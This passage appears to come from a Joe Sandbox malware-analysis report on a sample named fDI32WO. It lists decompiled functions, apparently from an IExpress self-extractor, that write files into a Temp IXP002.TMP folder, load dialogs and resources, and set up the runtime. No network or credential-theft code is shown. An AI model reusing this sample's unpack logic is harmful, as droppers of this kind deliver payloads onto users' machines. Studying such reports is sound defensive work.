                                                                                                                                                                                                                                              				struct HWND__* _t34;
                                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __edi;
                                                                                                                                                                                                                                              				_t27 = __ebx;
                                                                                                                                                                                                                                              				_t11 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                              				_t34 = _a4;
                                                                                                                                                                                                                                              				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                                                                                              					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                              					E00A843D0(_t34, _t15);
                                                                                                                                                                                                                                              					_v520 = 0;
                                                                                                                                                                                                                                              					LoadStringA( *0xa89a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                              					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					if(_t14 != 1) {
                                                                                                                                                                                                                                              						L4:
                                                                                                                                                                                                                                              						_t23 = 0;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t32 = _a12;
                                                                                                                                                                                                                                              						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                              							_t23 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                              			}














                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00A81A18
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00A81A24
                                                                                                                                                                                                                                              • LoadStringA.USER32(?,?,00000200), ref: 00A81A4F
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A81A62
                                                                                                                                                                                                                                              • MessageBeep.USER32(000000FF), ref: 00A81A6A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1273765764-0
                                                                                                                                                                                                                                              • Opcode ID: cddbdc02e01676f3c5eb795b9de0272575d43ec5558d37a246f9d0e8b0d1574b
                                                                                                                                                                                                                                              • Instruction ID: 65abc837e2deba7a2a10ac3bf35f0f9258f18ba753a271972df290aa846dec2d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cddbdc02e01676f3c5eb795b9de0272575d43ec5558d37a246f9d0e8b0d1574b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B11E131500109AFEB04FFA4DE4CAAEBBB8EF19340F008251F91296190DB349E02CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A87155() {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				struct _FILETIME _v16;
                                                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                                                              				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                              				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                              				_t23 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                              					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                              					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                              					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                              					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                              					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                              					_t39 = _t36;
                                                                                                                                                                                                                                              					if(_t36 == 0xbb40e64e || ( *0xa88004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                              						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                              						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0xa88004 = _t39;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t37 =  !_t36;
                                                                                                                                                                                                                                              				 *0xa88008 = _t37;
                                                                                                                                                                                                                                              				return _t37;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A87182
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00A87191
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A8719A
                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00A871A3
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A871B8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                                                                                                                              • Opcode ID: d25d92db91eb8bd08a8dbfbbfcab029a3637280ba8934dea9abe94a44541f0ce
                                                                                                                                                                                                                                              • Instruction ID: 33b00c3086383677f9c92c7c86a6e69745c750e5c1e7dc598beebbe415f48079
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d25d92db91eb8bd08a8dbfbbfcab029a3637280ba8934dea9abe94a44541f0ce
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F114C71D01208DFCB10DFF8DA4CA9EBBF4EF18310FA14A56D906E7220EB349A058B41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                                                                                                              			E00A863C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				long _v272;
                                                                                                                                                                                                                                              				void* _v276;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                                                              				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t15 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                              				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_v276 = _a16;
                                                                                                                                                                                                                                              				_t37 = 1;
                                                                                                                                                                                                                                              				E00A81781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                              				E00A8658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                              				_t28 = 0;
                                                                                                                                                                                                                                              				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                              				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                              					_t28 = _a4;
                                                                                                                                                                                                                                              					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                              						 *0xa89124 = 0x80070052;
                                                                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					CloseHandle(_t39);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					 *0xa89124 = 0x80070052;
                                                                                                                                                                                                                                              					_t37 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                              			}















                                                                                                                                                                                                                                              0x00a86444
                                                                                                                                                                                                                                              0x00a86444
                                                                                                                                                                                                                                              0x00a86492

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A8642D
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A8645B
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A8647A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A863EB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                              • API String ID: 1065093856-1610346413
                                                                                                                                                                                                                                              • Opcode ID: 902aa6e38c789997a30e0d8e8e688a0a44daeeb5c7bd36b52985629438905199
                                                                                                                                                                                                                                              • Instruction ID: 87016037b562b59c9f3ada3c999c672ed19ea4667b9ce01b8fa1626bccad4cf3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 902aa6e38c789997a30e0d8e8e688a0a44daeeb5c7bd36b52985629438905199
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C21C071A00218ABEB10EF65DCC5FEB73B8EB54314F0042A9A585A7280DAB05D858FA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A847E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                                                                              				intOrPtr _t9;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                              				intOrPtr* _t22;
                                                                                                                                                                                                                                              				void _t24;
                                                                                                                                                                                                                                              				struct HWND__* _t25;
                                                                                                                                                                                                                                              				struct HWND__* _t26;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				intOrPtr* _t28;
                                                                                                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                                                                              				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                              				if(_t34 != 0) {
                                                                                                                                                                                                                                              					_t22 = _t33;
                                                                                                                                                                                                                                              					_t27 = _t22 + 1;
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t6 =  *_t22;
                                                                                                                                                                                                                                              						_t22 = _t22 + 1;
                                                                                                                                                                                                                                              					} while (_t6 != 0);
                                                                                                                                                                                                                                              					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                              					 *_t34 = _t24;
                                                                                                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                                                                                                              						_t28 = _t33;
                                                                                                                                                                                                                                              						_t19 = _t28 + 1;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t9 =  *_t28;
                                                                                                                                                                                                                                              							_t28 = _t28 + 1;
                                                                                                                                                                                                                                              						} while (_t9 != 0);
                                                                                                                                                                                                                                              						E00A81680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                              						_t11 =  *0xa891e0; // 0x808e20
                                                                                                                                                                                                                                              						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                              						 *0xa891e0 = _t34;
                                                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t25 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              					E00A844B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                              					LocalFree(_t34);
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t26 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              				E00A844B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                                                              			}
















APIs
• LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A84E6F), ref: 00A847EA
• LocalAlloc.KERNEL32(00000040,?), ref: 00A84823
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A84847
  • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
  • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
Strings
• C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A84851
Memory Dump Source
• Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
Similarity
• API ID: Local$Alloc$FreeLoadMessageString
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
• API String ID: 359063898-1610346413
• Opcode ID: 75f1381c13eb091f91fae24697c6f8940ab02f6a3d0350a544cfa1562fed7c12
• Instruction ID: 35b84857f360436fd5d3c8e6842c3bbbbd2eb68438b549729d0c46233c4acd69
• Opcode Fuzzy Hash: 75f1381c13eb091f91fae24697c6f8940ab02f6a3d0350a544cfa1562fed7c12
• Instruction Fuzzy Hash: 9111E575604642AFE718EFB49C18F773B6AEB89700F048519FA829B341DA399C078760
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00A83680(void* __ecx) {
    void* _v8;
    struct tagMSG _v36;
    int _t8;
    struct HWND__* _t16;

    _v8 = __ecx;
    _t16 = 0;
    while(1) {
        _t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
        if(_t8 == 0) {
            break;
        }
        if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
            continue;
        } else {
            do {
                if(_v36.message != 0x12) {
                    DispatchMessageA( &_v36);
                } else {
                    _t16 = 1;
                }
                _t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
            } while (_t8 != 0);
            if(_t16 == 0) {
                continue;
            }
        }
        break;
    }
    return _t8;
}








APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A8369F
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A836B2
• DispatchMessageA.USER32(?), ref: 00A836CB
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A836DA
Memory Dump Source
• Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
Similarity
• API ID: Message$Peek$DispatchMultipleObjectsWait
• String ID:
• API String ID: 2776232527-0
• Opcode ID: bcfcd143f7342f8462041cc4196a0272fe2e663dfc64cd9c60c33082c7dfdecc
• Instruction ID: e5eb25547802ed8aa4d166363f5984a63b3958bc28a34c36e0b57d10c79b3b20
• Opcode Fuzzy Hash: bcfcd143f7342f8462041cc4196a0272fe2e663dfc64cd9c60c33082c7dfdecc
• Instruction Fuzzy Hash: 3A01447390025577DF30ABEA9C4CEEB7A7CEB85F10F14022ABA15E2280E5658645C761
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%
E00A86517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
    struct HRSRC__* _t6;
    void* _t21;
    struct HINSTANCE__* _t23;
    int _t24;

    _t23 =  *0xa89a3c; // 0xa80000
    _t6 = FindResourceA(_t23, __edx, 5);
    if(_t6 == 0) {
        L6:
        E00A844B9(0, 0x4fb, 0, 0, 0x10, 0);
        _t24 = _a16;
    } else {
        _t21 = LoadResource(_t23, _t6);
        if(_t21 == 0) {
            goto L6;
        } else {
            if(_a12 != 0) {
                _push(_a12);
            } else {
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                              						FreeResource(_t21);
                                                                                                                                                                                                                                              						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t24;
                                                                                                                                                                                                                                              			}








APIs
• FindResourceA.KERNEL32(00A80000,000007D6,00000005), ref: 00A8652A
• LoadResource.KERNEL32(00A80000,00000000,?,?,00A82EE8,00000000,00A819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A86538
• DialogBoxIndirectParamA.USER32(00A80000,00000000,00000547,00A819E0,00000000), ref: 00A86557
• FreeResource.KERNEL32(00000000,?,?,00A82EE8,00000000,00A819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A86560
Memory Dump Source
• Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
Similarity
• API ID: Resource$DialogFindFreeIndirectLoadParam
• String ID:
• API String ID: 1214682469-0
• Opcode ID: c895ae485acd633fc5c75321d7e50d68ac98e67913c2d1330386db3510f1fc6e
• Instruction ID: b02eac8cf84c799b8ed684c01fdcd4aa7d9111e5060d3c0e251786c171455bd5
• Opcode Fuzzy Hash: c895ae485acd633fc5c75321d7e50d68ac98e67913c2d1330386db3510f1fc6e
• Instruction Fuzzy Hash: 13012672100209BBEB10AFA99C08DBB7B6DEB89760F000126FE00A3190D7718C1287A1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%
E00A865E8(char* __ecx) {
	char _t3;
	char _t10;
	char* _t12;
	char* _t14;
	char* _t15;
	CHAR* _t16;

	_t12 = __ecx;
	_t15 = __ecx;
	_t14 =  &(__ecx[1]);
	_t10 = 0;
	do {
		_t3 =  *_t12;
		_t12 =  &(_t12[1]);
	} while (_t3 != 0);
	_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
	while(1) {
		_t16 = CharPrevA(_t15, ??);
		if(_t16 <= _t15) {
			break;
		}
		if( *_t16 == 0x5c) {
			L7:
			if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
				_t16 = CharNextA(_t16);
			}
			 *_t16 = _t10;
			_t10 = 1;
		} else {
			_push(_t16);
			continue;
		}
		L11:
		return _t10;
	}
	if( *_t16 == 0x5c) {
		goto L7;
	}
	goto L11;
}









                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86610
                                                                                                                                                                                                                                              0x00a86644
                                                                                                                                                                                                                                              0x00a86647
                                                                                                                                                                                                                                              0x00a86647
                                                                                                                                                                                                                                              0x00a86621
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A82B33), ref: 00A86602
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 00A86612
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 00A86629
                                                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00A86635
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Prev$Next
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3260447230-0
                                                                                                                                                                                                                                              • Opcode ID: 19c178774ac5b7ac7a9b4c7acd421f826a21688626362ae9cec71d9d4b94d788
                                                                                                                                                                                                                                              • Instruction ID: 48751d413fae7926815b7eec9aa08c868f1da453fd224b7bc92824cb4777e943
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19c178774ac5b7ac7a9b4c7acd421f826a21688626362ae9cec71d9d4b94d788
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52F0F4324041D06EF7367B688CCC8BBAF9CDF9B254B2902BFE49192001E6150D068B62
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A869B0() {
                                                                                                                                                                                                                                              				intOrPtr* _t4;
                                                                                                                                                                                                                                              				intOrPtr* _t5;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				 *0xa881f8 = E00A86C70();
                                                                                                                                                                                                                                              				__set_app_type(E00A86FBE(2));
                                                                                                                                                                                                                                              				 *0xa888a4 =  *0xa888a4 | 0xffffffff;
                                                                                                                                                                                                                                              				 *0xa888a8 =  *0xa888a8 | 0xffffffff;
                                                                                                                                                                                                                                              				_t4 = __p__fmode();
                                                                                                                                                                                                                                              				_t11 =  *0xa88528; // 0x0
                                                                                                                                                                                                                                              				 *_t4 = _t11;
                                                                                                                                                                                                                                              				_t5 = __p__commode();
                                                                                                                                                                                                                                              				_t12 =  *0xa8851c; // 0x0
                                                                                                                                                                                                                                              				 *_t5 = _t12;
                                                                                                                                                                                                                                              				_t6 = E00A87000();
                                                                                                                                                                                                                                              				if( *0xa88000 == 0) {
                                                                                                                                                                                                                                              					__setusermatherr(E00A87000);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E00A871EF(_t6);
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A86FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A86FC5
                                                                                                                                                                                                                                              • __set_app_type.MSVCRT ref: 00A869C2
                                                                                                                                                                                                                                              • __p__fmode.MSVCRT ref: 00A869D8
                                                                                                                                                                                                                                              • __p__commode.MSVCRT ref: 00A869E6
                                                                                                                                                                                                                                              • __setusermatherr.MSVCRT ref: 00A86A07
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1632413811-0
                                                                                                                                                                                                                                              • Opcode ID: a76233d2c42ee66bd06ff93d0c5d1d2d9a79f0e578abbc9f65993f47bb2ffc66
                                                                                                                                                                                                                                              • Instruction ID: 9abdf85a28830c099057095895b097cc5ebf5f31a35c285d32fa293eb12634f8
